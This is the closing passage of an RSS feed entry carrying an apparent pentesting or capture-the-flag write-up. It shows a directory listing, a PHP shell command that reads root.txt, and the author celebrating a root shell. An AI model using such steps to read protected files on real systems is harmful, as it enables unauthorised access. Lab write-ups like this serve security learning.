[4] =&amp;gt; .local
[5] =&amp;gt; .php_history
[6] =&amp;gt; .profile
[7] =&amp;gt; .viminfo
[8] =&amp;gt; root.txt
[9] =&amp;gt; snap
)

php &amp;gt; echo file_get_contents('root.txt');
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Essentially, now I have root shell and from here sky is the limit. &lt;/p&gt;

&lt;p&gt;Whole process was, as I said, super thrilling. It is a interesting mixture of thrill when you do something bad and of fulfillment when you do something good. But more on that some other time. &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>pentesting</category>
    </item>
  </channel>
</rss>
